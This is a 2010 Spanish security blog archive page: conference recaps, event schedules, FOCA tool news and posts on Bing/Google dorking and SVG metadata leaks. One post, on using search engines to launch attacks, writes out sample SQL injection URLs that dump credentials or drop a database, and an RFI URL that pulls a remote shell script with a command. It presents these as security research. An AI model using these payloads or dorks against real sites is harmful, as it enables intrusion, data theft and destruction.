Yo no he podido asistir a todas las charlas, pero me he pasado tres días revoloteando por allí, tomando café y cerveza con asistentes, no asistentes a la conferencia, amigos y conocidos. He bajado a ver el CTF ese que RoMaNSoFt, Dreyer y Antonio se curraron y que ganó Whats, en los últimos minutos adelantando a Dani "The Doctor" Kachakil, que se dio una buena paliza. RoMaNSoFt les cascó a los participantes un LDAP Injection que ha prometido ponernos online para que juguemos con él.

La conferencia fue también un lugar para poner caras a muchos de los compañeros del twitter, a bloggers y, como no, a ver a muchos ponentes fantásticos: David "blue-eyes" Barroso y su charla de iOrchad para hacer una botnet de ay!fons al estilo Homer Simpson, David "the artist" López López y sus hackers & superheres [Me moló tanto que me compré un poster, el que dejó firmado }:)) ], Fermín J. Serna, con EMET y las protecciones a bajo nivel para dificultar la creación de Exploits, Alfonso Muñoz y su steganografía, la charla de Rubén Santamarta y como crear un 0-day siguiente una lógica deductiva de ingeniería inversa, la charla de Joxean y su Oracle Financials que acabó en la tele, Sergio "Anelkaos" y su WiFiSlax, Alejandro Ramos "dab" y su charla de Operación Triunfo Personal, Vierito5 y Eloy y su Android, Radare2 para los amantes del low-level que acabó en las noticias, Pedro Sánchez y sus experiencias en el análisis Forense de malware bancario, etcétera, etcétera, etcétera...

Por supuesto, los asistentes fueron lo más, entre el público mucha cara conocida [la lista es muuuuuuuuuuuuuy larga], mucho amigo y mucho cabronazo que no se dedicó nada más que a darme por saco, parece que este año ha sido el año de: "...vamos a hacerle alguna a Chema...". Así que desde que "algún hamijo" inició la veda con el gorrito de rayas y el Windows Mola, parece que había que lanzarme alguna pulla en todo momento... Sí, yo también os quiero, PANDA DE CABRONES.

Para terminar quería agradecer a la organización el haberme dejado participar allí y felicitarles por el resultado obtenido. Espero que los chicos que allí han estado currando [Deese, Raúl, Paco, PatoWC, Guachi, Arancha y Ricardo] tengan fuerzas para continuar el año que viene. Puedes leer los reportajes de Guachi en SecurityByDefault [Día 1, Día 2, Día 3] y ver lo que la gente ha dicho en el twitter [#rootedcon y #rooted2010].

Saludos Malignos!

sábado, marzo 20, 2010

Vigilado

Hace tiempo que tengo las sensación de que me vigilan. No sé si será la paranoia o la realidad. Ya os dije que no me parecía casualidad que el malignomovil apareciera mal aparcado en Google Earth... me vigilan.

Curiosamente, tras acabar la gira Up To Secure, Google ha vuelto a actualizar Google Chrome con una de las críticas que le llevaba hechas desde hace tiempo: Que no parecía muy usable la forma de desactivar Javascript en la herramienta, que no fuera configurable por sitios y que se hiciera por comandos... hasta la versión v0.4.154.23. Pero la última actualización, la 4.1.249.1036, que se ha instalado solita en mi portátil, ya ha agredado esta opción.


Deshabilitar javascript y usar listas blancas o negras

Y además con la posibilidad de trabajar con listas blancas o listas negras. Biiiiiien.

Ahora hay que seguir, con un poco más de granularidad, para configurar detalles de javascript y html para distintos entornos de trabajo y la integración con el Active Directory para poder gestionarlos de forma centralizada.

No obstante me mola que lo hayan actualizado porque lo anterior no tenía sentido. A todos los que os he sacado en una charla para desactivar Javascript de vuestro Google Chrome en público os pido disculpas, pero, como véis, era por una buena causa }:)) ¿Será que Google oye "mis plegarias"?

Saludos Malignos!

viernes, marzo 19, 2010

¡Feliz en tu día!

Sí, quizá muchos lo sabéis, hoy es un día especial, es un día de celebración porque hoy… ¡Internet Explorer 8 hace un año!

Aun recuerdo con cariño como mi “padrino” me dijo: “No te preocupes Chema, yo muevo lo que haga falta para que el día de tu santo tu tengas tu regalo”. No hay nadie como "ÉL" cuando quiere hacer un regalo: “Ya hablo yo con Steve y te lo arreglo”. ¡Gracias!

Así, con el regalo que me hizo ha pasado un año y ha llegado el anuncio de la versión de Internet Explorer 9, pero el año pasado fue especial. En ese día tan lejano hace un año cuando nació Internet Explorer 8 el ecosistema de navegadores de Internet era muy distinto. Google Chrome estaba aun en la versión 1.0 [- y ya está en la 4.0 digi-evolucionando Google de vivir en el beta perenne a tener una versión “final” cada cuatro meses -] y Mozilla Firefox estaba en la versión 3.0.
¡Qué tiempos aquellos en los que IE8 era el único que venía con DEP (permanente) y ASLR! Luego lo meterían los demás chicuelos del grupo y los amigos del “security researching” le meterían horas para saltárselos en los exploits.

Sin embargo, Internet Explorer 8, a pesar de ser la versión más antigua de los navegadores de la competencia, aun está lejos de poder retirarse. A diferencia de otros navegadores de otras compañías, esta versión va a tener que ser mantenida y parcheada durante largo tiempo. Aun debe jubilarse primero el pobre Internet Explorer 6 que lleva currando desde el 2001 [¡qué navegadores los de aquellos años!].

Luego, en el año 2015, en la BlackHat, podremos ver como se siguen haciendo demos hackeando este navegador, porque no habrá perdido ni el glamour, ni el morbo. ¿Alguien se imagina una BlackHat 2010 en la que se hackee Firefox 2.0 o Google Chrome 1.x? No, eso no tiene morbo, pero con Internet Explorer siempre hay esa gracieta.

Durante este año Internet Explorer 8 ha tenido 32 vulnerabilidades de seguridad:


Internet 8 cumpliendo 1 añito

Por el contrario, uno de sus competidores, "el navegador seguro", Mozilla Firefox 3.5, en sólo 9 meses, ha tenido 54.


54 Vulnerabilidades en 9 meses

En fin, que el “pobre IE8” tiene un largo camino. Así que le dejo algunas frases de aliento para que aguante el duro trabajo que le queda por delante:

En tu opinión, ¿cuál es la combinación más segura de SO + navegador para usar?

Esa es una buena pregunta. Chrome o IE8 sobre Windows 7 sin Flash installed. Probablemente no hay suficiente diferencia entre ambos navegadores como para preocuparse. El asunto principal es no instalar Flash!

Charlie Miller, ganador de los 2 últimos Pwn2Own


Y el tweet de apoyo a IE8 de Rubén Santamarta:


Reversemode "apoyando" a IE8

Hoy es su cumple, démosle un día sin otro navegador. Sniff. ¡Qué bonito!

Saludos Malignos!

PD: Si estás en la RootedCON deja de leer este post y ponte a atender a las charlas "cohones!"

jueves, marzo 18, 2010

¿Y no tienes entrada?

Vaya, cuanto lo siento. La verdad es que me encantaría poder conseguiros entradas a todos los que me la habéis solicitado, pero es que para mí es imposible. No está en mi mano. Me gustaría poder sacarlas. He tenido que recomprar algunas entradas para poder conseguirlas a amigos. Total… ¿qué te vas a perder? ¿La primera RootedCON? ¿Charlas de seguridad y hacking de un montón de bestias? ¿El ambiente que habrá por allí?

Bueno, no te preocupes, podrás seguirlo por el twitter con la búsqueda #rootedcon o #rooted2010, o podrás esperar a los reportajes que haga la gente de SecurityByDefault, o podrás ver las fotos que se publicando o lo que pongan cada uno de los ponentes en sus blogs. Yo iré tarde, pero estaré por allí, para disfrutar un poco de todo esto. Esta es la agenda de este año.

Sé que si te has quedado sin entradas o si no has conseguido las fechas para asistir, es una putada, con lo que no quiero darte más envidia, pero el plantel merecía la pena. Tal vez el año que viene puedas apuntarte a un #rootedlab o a la #rootedcon con tiempo y no te enteres de lo que pasa por otros.

Saludos Malignos!

miércoles, marzo 17, 2010

La última antes de Semana Santa

Si el físico nos lo permite, acabaremos el mes de marzo con una buena cantidad de actividades. Yo iré a dar una conferencia a Orense, luego pasaré por el Asegúr@IT 7 [con cena la noche antes] para terminar en Tudela con una conferencia y un curso de WiFi que daré yo. Además, el viernes comenzaremos el penúltimo módulo del FTSAI, dedicado a WiFi, VPNS y sistemas de mensajería instantaena. Este es el calendario:

Lunes, 22

[Madrid] HOL SharePoint Portal Server 2010: Implementing
[Madrid] HOL SharePoint Portal Server 2010: Workflow

Martes, 23

[Madrid] HOL SharePoint Portal Server 2010: Entornos Colaborativos
[Online] Virtual HOL Exchange Server 2010: Implementing

Miercoles, 24

[Barcelona] Asegúr@IT 7
[Madrid] HOL SharePoint Portal Server 2010: Gestión de Contenido
[Madrid] HOL SharePoint Portal Server 2010: Customización
[Online] Virtual HOL Exchange Server 2010 Alta disponibilidad
[Online] Virtual HOL Exchange Server 2010: Migración desde Exchange 2003

Jueves, 25

[Madrid] HOL SharePoint Portal Server 2010: Servicios de Búsqueda
[Online] Virtual HOL Exchange Server 2010: Mensajería unificada
[Tudela] Security Week

Viernes, 26

[Madrid] HOL SharePoint Portal Server 2010: Business Intelligence
[Tudela] DL04 : Tecnología WiFi
[Madrid] FTSAI V: WiFi, VPNS y Mensajería instantanea
[Online] Quest ActiveRoles Server para MS Active Directory & Exchange

Saludos Malignos!

Sin descanso pero muy agradecido

Si alguien se ha molestado en mirar en el blog el componente de "Próximos Eventos" se habrá dado cuenta de que a partir del mes de Marzo estaba vacío. La explicación a este fenómeno es algo tan sencillo y mundando como que el físico no me da para más si no descanso un poco. Desde luego no pienso quejarme de mi trabajo y de las mil cosas que hago, ya que me siento agradecido por poder hacer algo que me gusta tanto, pero a partir de Abril necesito algo de tiempo para acabar dos proyectos personales que tengo a medias: Un libro sobre seguridad web y el documento final de la tesis doctoral.

Este es el plan original, y por ello no hay eventos más allá de las vacaciones de Semana Santa. Sin embargo, voy a tener que rectificar ese planing inicial por razones de "fuerza mayor" ya que nos han seleccionado para Black Hat Europe 2010 con la charla de Connection String Parameter Pollution Attacks.

Si, no es nueva, pero parece que gustó en BlackHat DC y nos han metido en la agenda de la edición europea de 2010 y eso es una razón de fuerza mayor para modificar un poco los planes iniciales. Más cuando en la agenda hay gente como Don Ero Carrera, Moxie Marlinspike, Mariano Nuñez (que bueno volver a verte!), FX, Sirdarkcat y un largo etcétera... Además, el viaje es corto para mí, ya que estoy a un vuelo de AVE, y estoy en casa, así que podré hacer de guía y sacar a los speakers a cenar por ahí en algún fiestorrillo.

Es la tercera vez consecutiva que presentamos un trabajo en BlackHat Europe y, aunque esté destrozado físicamente, y ya no sea una novedad ni la charla y estar en BlackHat, sigo sintiendome agradecido por estar allí.

Saludos Malignos!

martes, marzo 16, 2010

Buscadores como arma de destrucción masiva [I de III]

*********************************************************************************************
- Buscadores como arma de destrucción masiva [I de III]
- Buscadores como arma de destrucción masiva [II de III]
- Buscadores como arma de destrucción masiva [III de III]
Autores: Chema Alonso & Enrique Rando
*********************************************************************************************

Cuando se habla de buscadores y seguridad, rápidamente vienen a la mente diversas técnicas de recolección de información y de detección de fugas de datos. Técnicas, como Google Hacking o Bing Hacking, “pasivas” y no intrusivas.

Pero no acaban ahí las posibilidades. Éste artículo se centra en el uso de los buscadores como armas, capaces de realizar acciones intrusivas contra los sitios web. Buscadores que se convierten en herramientas que pueden ser útiles para las actividades de pentesting o exploiting.

A.- Ejecución de exploits

Muchas vulnerabilidades de aplicaciones web pueden explotarse inyectando algún tipo de ataque en los parámetros GET de una URL. Por ejemplo, extraer los datos de los usuarios del sitio puede resultar así de fácil:

http://www.webjodida.com/listado.php?id=a’ union select login,password from tabla_usuarios --

O, si lo que desea uno es cepillarse la base de datos completa:

http://www.webjodida.com/listado.php?id=Bobby’ ; drop database students --

O, si se prefiere, también tenemos el típico ataque RFI que muestra el listado de ficheros de la unidad raiz:

http://www.webjodida.com/control.php?page=http://sucks.sucks/shell.txt?cmd=dir+c:\

Por supuesto, muchas empresas se previenen contra estos ataques y realizan sus buenas auditorías, forman adecuadamente a su personal, desarrollan el software siguiendo prácticas seguras y montan WAFs que filtran estas URLs tan “divertidas”. Por supuesto, otras no.

Imaginemos que alguien descubre una vulnerabilidad en una web que es explotable con una única petición, inyectando el ataque en un parámetro GET. Y supongamos que no quiere poner las cosas fáciles a quien intente localizarle.

Aquí es donde entran en juego nuestros amigos. El atacante podría pedir a varios buscadores la indexación de una URL con el exploit. O que indexaran una página cuyo código contenga links a los exploits a ejecutar. Después, cada buscador, para realizar como es debido su trabajo, se vería obligado a visitar la página y, al hacerlo, desencadenaría el ataque.

Posteriormente, cuando se investigara el asunto, el sitio atacado sólo tendría la IP y el User-Agent del buscador. No los del atacante. Y, lo que es peor (o quizá lo mejor, según para quién), es que los resultados del ataque podrían quedar accesibles al público tanto a través de las páginas de resultados como de las cachés de los buscadores. De ese modo, cualquiera podría consultarla sin que la organización propietaria de la web tenga conocimiento de ello.

Para investigar estas aplicaciones, se han hecho algunas webs de prueba y se ha pedido a diversos buscadores que indexen URLs maliciosas. De esta forma pudimos, por ejemplo, ver como Google indexa y guarda en su caché resultados de ejecutar un SQL Injection a una página:


Figura 1. URL maliciosa indexada por Google. La URL aparece en la barra de estado


Figura 2. Los datos están en la Caché

O también observar como Exalead es capaz de borrar los datos de una tabla sin siquiera despeinarse. ¡Y después presume de ello!:


Figura 3. Cuéntale al jefe que un buscador se cargó tus datos. Pero, antes, actualiza tu curriculum.

O que Yahoo! te puede sacar usuarios y contraseñas de un sitio (ver el resumen asociado al resultado):


Figura 4. Usuario y Contraseña por SQL Injection en la página de resultados.

Si exceptuamos lo de la caché y el escarnio público, el problema aquí no es que el buscador se convierta en el arma homicida. El atacante podría haber usado cualquier otra herramienta o conexión para lanzar el ataque. Podría haberse conectado a una WiFi desprotegida, o irse a cualquier red que no fuera suya, para lanzar el ataque, podría haber usado una conexión anónima… lo que fuera. Mientras la vulnerabilidad exista, podrá ser explotada.

Lo que no deja de sorprender es que un buscador no tenga implementado un sistema de filtrado de URLs, es decir, que un servicio que gestiona URLs, y que visita las correspondientes páginas web, no realice un análisis de las mismas para detectar ataques XSS, RFI o SQLI, por ejemplo. Y es algo que no se limita a los buscadores: indexadores, acortadores de URL, generadores de thumbnails de páginas, etcetera pueden presentar problemas similares.

Por supuesto, una forma de protegerse de este comportamiento de los buscadores podría ser poner un robots.txt que filtrase los directorios donde las aplicaciones se están ejecutando. La pregunta es, ¿hasta qué punto es efectiva esta medida?

*********************************************************************************************
- Buscadores como arma de destrucción masiva [I de III]
- Buscadores como arma de destrucción masiva [II de III]
- Buscadores como arma de destrucción masiva [III de III]
Autores: Chema Alonso & Enrique Rando
*********************************************************************************************

lunes, marzo 15, 2010

FOCA 2 alpha [t-5]

Ya os enseñé algunas capturas de la FOCA 2 alpha, pero como esto va avanzando y queda poco para que salga liberada la primera versión, os dejo aquí una nueva, en la que se puede apreciar como se está añadiendo el reconocimiento de software y hostnames a través de SHODAN. John, el papá de SHODAN, nos ha habilitado un API especial para la FOCA, y desde aquí se lo queremos agradecer públicamente.


FOCA con Shodan

La FOCA 2 en alpha se ha convertido en un monstruo que ya no sé como Thor está gobernando el código y las pruebas. Cada prueba de un dominio toma horas en poder realizarse y, de aquí a fin de año, crecerá más, pues vamos a afinar mucho los módulos de Reconocimiento de Software y visualización de resultados, así que, en el momento que esté liberado esperamos mucho feedback vuestro sobre mejoras, fallos o errores que puedan ser subsanados. Quedan poco más de 5 días para que se libere.


Saludos Malignos!

domingo, marzo 14, 2010

Claudcomputin: La inteligencia está en la red

Me ha encantado este video, estoy convencido que se grabó después de comer, es decir, después de lo que se toma "después del café", si no no tiene otra explicación. La verdad es que si yo fuera Google estaría acojonado.


...Y nosotros tenemos la red

Saludos Malignos!

sábado, marzo 13, 2010

Cemento Armado

La cara que tiene Enrique Dans está hecho de eso, de cemento armado. Durante años se ha pasado diciendo topicazos, populismos o directamente errores de bulto cuando ha hablado de seguridad... y ahora dice que "cuando no sabe de algo deja hablar a los expertos". Me parto la caja. Para comprobar esto sólo hay que ver el famoso post de "¿Google Caido?" en el que no sabe diferenciar un mensaje de error del ping o en el que descubría sorprendido los atajos de teclado y el uso de la tecla de Windows... en Noviembre del año 2006. ¡Eso es ser un experto en tecnología! Con dos "cohones".

Pero lo mejor de toda ha sido ya, como obligado por el destino a comerse todas sus palabras, el que su libro haya salido... con DRM. Es lo más parecido que he visto a la justicia divina. Eso sí, el alardeó durante mucho tiempo que su libro iba a salir con licencia Common Creative, pero... no dijo nada del DRM.

Lo que es genial es el trabajo que ha hecho Teleoperador recogiendo algunas de las afirmaciones que este tipo, que va de tecnologo y es el técnicoless mayor del reino, había dicho del DRM. Algunas perlas:

los consumidores jamás quisimos DRM. De hecho, nos opusimos a él, porque restringía nuestras posibilidades de utilizar los productos por los que habíamos pagado. Para introducir DRM en los productos, había que incurrir en un gasto adicional: un gasto efectuado para “estropear” el producto, no para mejorarlo.

Enrique Dans en su blog, 7 de enero de 2009

[el DRM sólo es] una manera estéril de fastidiar a los usuarios y lanzarlos en manos de ofertas más ventajosas.

Enrique Dans en Público, 9 de enero de 2009

Que fácil ha sido siempre para este tipo disparar con la pólvora del rey y hablar de los negocios ajenos, pero ahora, que es su negocio, la cosa cambia. Por favor, no os perdáis el momento de la contestación sobre el tema del DRM en la presentación del libro. La cara [de cemento armado] merece la pena. Creo que me voy a poner este vídeo todas las mañanas para empezar el día con alegría.


Saludos Malignos!

viernes, marzo 12, 2010

Dibujando desde casa

No, no voy a hablaros de las ganas que tengo de tener tiempo para poder dibujar un rato algunas tiras de No Lusers. Es algo que me está matando estas fechas atrás, no poder agarrar el ordenador y dibujar durante alguna hora. En este caso os vengo a hablar del caso del Scalable Vector Graphic SVG. Un formato de fichero muy chulo escrito en XML.

Sí, está escrito en XML, por lo tanto es texto, y su eso cada vez es más extendido. Este ficherito normalmente tiene una extensión .svg o svgz si está comprimido, pero puede incluso entregarse a los navegadores con multiples extensiones. Tiene una firma propia que es "image/svg+xml" y que puede usarse para reconocerlo.

La gracia de este archivo es que guarda, en muchos de los elementos xml en él, información a rutas que, en algunas ocasiones, son locales. Así es posible localizar ficheros con información valiosa usando Google con el parámetro ext:svg.


Figura 1: Ficheros svg con rutas a perfiles de usuarios en Google

O utilizar BING usando la firma del fichero y buscando por ficheros txt


Figura 2: Ficheros svg con rutas a perfiles de usuarios en BING

Es curioso el formato y, la verdad, se comporta casi igual que los modernos ODF u OOXML, ya que el fichero puede llevar incrustados sus propios metadatos, su información oculta en sus rutas y documentos embebidos. Así, si vemos el ejemplo de la Figura 3, dentro de un fichero puede haber imágenes y éstas a su vez contener sus propios metados en EXIF o XMP.


Figura 3: PNG dentro de SVG

De todas formas, mi favorito es este, que trabaja sus iconos desde su /home/root, porque, como decía al principio, nadie se siente mejor que trabajando desde casa.


Figura 4: Trabajando en casa

Habrá que pensar en analizar bien este fichero y metérselo también a la Foquita.

Saludos Malignos!

jueves, marzo 11, 2010

Un poco de Bing Hacking (III de III): Ip & more

***************************************************************************************************
- Un poco de Bing Hacking (I de III): Filetype & inurl
- Un poco de Bing Hacking (II de III): Feed & Contains
- Un poco de Bing Hacking (III de III): Ip & more
***************************************************************************************************

5) Buscando por IPs. La idea del comando IP es bueno, y llama poderosamente la atención que Bing la implemente. No sé bien por qué, pero lo hace. El funcionamiento es tan simple como útil. Basta con poner una dirección IP y aparecen todos los sitios web que están en ella. Mola.


Figura 1: Buscando por IP en Bing

Vista la innegable utilizad de este comando en pentesting, hay múltiples herramientas que hacen uso de ella desde su primera puesta en uso dentro de live.com. Incluso la FOCA 2.0 hace uso de este comando para “tirar del hilo”. En Securitybydefault publicaron una tool que servía expresamente para esto que ayudo a programar Dani Kachakil llamada Vhoster.


Figura 2: Vhoster working

Lo gracioso de esto es que, no sé cómo ni por qué, pero seguro que a alguna barrabasada en la configuración del DNS, se pueden buscar direcciones IP privadas con resultados curiosos.


Figura 3: Sitios en IPs internas

6) Otros comandos. A parte de los ya vistos, BING tiene algunos otros modificadores, cuanto menos, curiosos. La lista resumén de todos ellos está en Comandos Bing:

-loc: Para buscar páginas localizadas en IPs relativas a un país. Para ello hay que usar los códigos internacionales de cada país. Atentos a los resultados de páginas en España buscando desde una IP alemana.


Figura 4: Páginas alojadas en España, a pesar de que estén en alemán

-prefer: para dar más importancia a un título.

- site: Funciona como en Google y lo puedes trucar para buscar dentro de URLs, como este ejemplito para buscar Outlook Web Access publicados. Estas cosas vendrán en una futura evolución de la FOCA for sure.


Figura 5: Buscando rutas a través de site

- intitle, inbody, inanchor: Permite buscar términos en zonas específicas de la web.

- hasfeed: Búsca webs con un feed RSS o atom que tengan un término.
Y el resto es jugar mezclando todo con los operadores lógicos.

Saludos Malignos!

***************************************************************************************************
- Un poco de Bing Hacking (I de III): Filetype & inurl
- Un poco de Bing Hacking (II de III): Feed & Contains
- Un poco de Bing Hacking (III de III): Ip & more
***************************************************************************************************

miércoles, marzo 10, 2010

La próxima semana: La RootedCon y los RootedLabs

Hola a todos, como suelo hacer una vez por semana, os spameo con a agenda de la semana que viene, pero esta semana que viene, a pesar de tener sólo cuatro días laborables, viene cargada con cosas muy jugosas. Los RootedLabs y la RootedCON.

Además, si no puedes asistir a estos eventos, en TENERIFE tendremos el fin de fiesta de la gira Up To Secure, en Madrid habrá Hands On Lab y, a través de Internet, tenemos la semana de los Virtual Hols dedicados a tecnologías Forefront. Esta es la agenda día a día:

Lunes, 15 de Marzo

[Madrid] RootedLAB - Reverse Engineering NO HAY PLAZAS
[Madrid] RootedLAB - Digital Forensics [1 plaza]
[Se regala el libro de Análisis Forense Digital en Windows]
[Madrid] HOL - Exchange Server 2010 - Mensajería Unificada

Martes, 16 de Marzo

[Tenerife] Up To Secure 2010 : Fin de Fiesta!
[Madrid] RootedLAB - Malware Analysis
[Se regala el libro de 10 años de Seguridad de Hispasec]
[Madrid] RootedLAB - Secure Enterprise WiFi
[Habrá Certificación oficial D-Link para los asistentes]
[Atentos al concurso twitter de plazas a 50%]
[Madrid] RootedLAB - Pentesting NO HAY PLAZAS
[Madrid] HOL - MS Project Server 2010
[Online] Virtual HOL - Forefront TMG 2010 : Implementing

Miércoles, 17 de Marzo

[Madrid] RootedLAB - Reverse Engineering NO HAY PLAZAS
[Madrid] RootedLAB - Hacking Web [1 plaza] {Este lo doy yo, je}
[Madrid] RootedLAB - Pentesting NO HAY PLAZAS
[Online] Virtual HOL - Forefront TMG 2010 : Firewalling

Jueves, 18 de Marzo

[Madrid] RootedCON día 1 NO HAY ENTRADAS
[Online] Virtual HOL - Forefront Client Security SP1
[Madrid] WhyFloss

Viernes, 19 de Marzo

[Madrid] RootedCON día 2 NO HAY ENTRADAS

Sábado, 20 de Marzo

[Madrid] RootedCON día 3 NO HAY ENTRADAS

Saludos Malignos!

UPDATE: Debido a una cancelación de última hora hay 1 entrada para el de Reverse Enginiering del día 15 y otra para el de Pentesting del día 17.

Como una Rock'n Roll Star

Cuando comencé en el año 2008 con mi primera charla en inglés en el extranjero, que os narré con vívido detalle en "Historia de una charla", poco iba a imaginarme que voy acercándome a las 20 conferencias en otros países. En este caso me encuentro en Alemania, en Heidelberg, en la Troopers 2010. De esta conferencia, la primera noticia que tuve fue gracias a Francisco Amato, que sé que estuvo por aquí en el año 2008, si no recuerdo mal. Aun no he llegado a las charlas, pero la cosa promete mucho con el speaker's manual que nos han preparado.


Figura 1: Troopers 2010 Speakers manual

La verdad es que no había visto tanto detalle a la hora de preparar el manual de una conferencia en ninguna otra. Hay que reconocer que es la mejor survival guide que me han pasado nunca. La guía son sólo 8 hojas, pero con los detalles cuidados para conseguir llegar aquí sano y salvo. En ella nos informan de que nos han preparado una habitación en un hotel para que descansemos bien, y luego la habitación es "que te cagas", nos han preparado la conexión a Internet, el Spa, las actividades para los que quieran salir a correr (locos por el deporte), qué visitar y todo. Según ellos los speakers de la troopers somos sus rock stars. Me ha encantado.


Figura 2: Ser una Rock Star

Pero es que todo va preparado al detalle. Siempre hay un plan B, o un plan C. En la guía nos describen como reconocer las estaciones, como comprobar que estamos en el sitio correcto, "tienes que estar en una galería semiciruclar con cristales". Vamos, hasta yo he sido capaz de llegar aquí sin saber nada de alemán. Pero si falla... siempre puedes llamar a Florian. Aunque tu gato se haya quedado embarazado o en la frontera te pase "cualquier cosa".


Figura 3: Cheat Sheet

Ya, claro, ¿y si no puedes llamar a Florian porque no tienes línea? Pues nada, sacas el comodín y pides help. Para ello llevamos un Joker con el que puedes llorar y suplicar ayuda a la primera chica que pase... vale, como dicen ellos, el comodín también vale para tipos con pelos y patas.


Figura 4: Offical Joker. Tentado he estado de usarlo

No sé como serán las conferencias, pero de momento la organización está de matrícula de honor. Mis más sinceros respetos por el trabajo que han realizado. No sé si yo les enseñaré algo mañana, pero yo ya he aprendido de ellos algunas cosas.

Saludos Malignos!

Entradas populares